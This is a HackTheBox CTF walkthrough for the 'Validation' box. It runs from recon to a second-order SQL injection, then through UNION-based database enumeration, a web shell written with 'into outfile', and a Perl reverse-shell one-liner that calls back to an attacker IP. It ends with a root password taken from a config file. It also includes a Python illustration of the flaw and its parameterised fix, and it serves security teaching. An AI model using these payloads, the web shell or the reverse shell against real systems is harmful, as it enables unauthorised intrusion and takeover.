Validation
An easy Linux box from HackTheBox, using a second order SQLi for initial access, and then finding a password in a config file for root.
Recon
The usual nmap scan:
nmap -sC -sV -oA nmap/validation 10.10.11.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:22 EDT
Nmap scan report for 10.10.11.116
Host is up (0.016s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looking at the HTTP port, we see a registration page.
When you submit the form, the request looks like this:
POST / HTTP/1.1
Host: 10.10.11.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.11.116
Connection: close
Referer: http://10.10.11.116/
Cookie: user=5e11f49b0320731e0898a5a4a676ada8
Upgrade-Insecure-Requests: 1
username=aaa&country=Brazil
Running sqlmap on the request doesn't give me anything, and if I try to register with a normal ' injection it works fine.
However, when sending a request to /account.php with my registration cookie, it returns an error, which points to some kind of second-order SQL injection:
Fatal error: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in /var/www/html/account.php
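The pattern behind this behaviour, as an added illustration and not the box's code (the PHP/MySQL source of account.php is not on the page): a Python/sqlite stand-in where the registration insert is parameterised, so the first request is not injectable, but the account page later splices the stored value into a new query. The hardened version binds the value again at that second hop, and the bare-quote case shows the error the page observed.

```python
import sqlite3

# Constructed stand-in for the box's "registration" table; the real PHP/MySQL source is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE registration (username TEXT, userhash TEXT, country TEXT)")
    return conn

def register(conn, username, userhash, country):
    # First-order input is bound as a parameter, so a quote in `country` cannot break
    # this statement (why fuzzing the registration request finds nothing). It is stored verbatim.
    conn.execute("INSERT INTO registration VALUES (?, ?, ?)",
                 (username, userhash, country))

def load_country(conn, userhash):
    row = conn.execute("SELECT country FROM registration WHERE userhash = ?",
                       (userhash,)).fetchone()
    return row[0] if row else ""

def account_vulnerable(conn, userhash):
    # Second order: the stored value is trusted and spliced into a new query,
    # so whatever SQL was saved at registration runs here.
    country = load_country(conn, userhash)
    cur = conn.execute(
        f"SELECT username FROM registration WHERE country = '{country}'")
    return sorted(r[0] for r in cur.fetchall())

def account_fixed(conn, userhash):
    # Same logic, but the value stays data at every hop: bind it again.
    country = load_country(conn, userhash)
    cur = conn.execute("SELECT username FROM registration WHERE country = ?",
                       (country,))
    return sorted(r[0] for r in cur.fetchall())

def demo():
    """Return (vulnerable result, fixed result, error text for a lone quote)."""
    conn = make_db()
    register(conn, "alice", "h-alice", "Brazil")
    # Constructed payload in the shape of the page's "' union select ...-- -".
    register(conn, "mallory", "h-mallory", "Brazil' UNION SELECT 'injected'-- -")
    register(conn, "bob", "h-bob", "Brazil'")  # a bare quote, the classic tell
    vulnerable = account_vulnerable(conn, "h-mallory")
    fixed = account_fixed(conn, "h-mallory")
    try:
        account_vulnerable(conn, "h-bob")
        error = None
    except sqlite3.OperationalError as exc:
        error = str(exc)  # the analogue of the page's fetch_assoc() on bool
    return vulnerable, fixed, error
```

Parameterising only the first request is exactly what makes the registration form look clean to a scanner; the fix is to treat the value as data wherever it is re-used.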
Exploitation
Let's try to dump the database. First, we can find out which database user we are with
username=123a&country=Brazil' union select user();-- -
in the registration request; then, when we visit /account.php, we see that the user is
<li class='text-white'>
uhc@localhost
</li>
Now we can try to dump the database, but first we need to know what it is called, by injecting
username=ghfj&country=Brazil' union select database();-- -
It returns that the database is called "registration", fair enough.
Using
' union select schema_name from information_schema.schemata;-- -
to enumerate the other databases.
There are 3 other databases, but they are the MySQL defaults: information_schema, performance_schema, and mysql.
Now we can enumerate the columns with
' union select column_name from information_schema.columns where table_name = 'registration';-- -
It returns that the registration table has 4 columns, username, userhash, country and regtime, so no passwords.
Here we can check what privileges our user has with
' union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'";-- -
In the long list we can see that we have the FILE privilege, which allows writing to files.
As a proof of concept, we can use
' union select "gg" into outfile '/var/www/html/gg.txt';-- -
and we can see it when navigating to 10.10.11.116/gg.txt.
Now we can upload a PHP web shell, using this one https://leons.im/posts/single-line-web-shell/, and writing it to wshell.php in the webroot:
<?php echo passthru($_GET['cmd']); ?>
With a web shell, we can upgrade to a full shell. Checking for interpreters with which shows no python, but the box does have perl:
perl -e 'use Socket;$i="10.10.14.6";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
In the reverse shell, we find a password in the config.php file:
uhc-9qual-global-pw
which is the root password.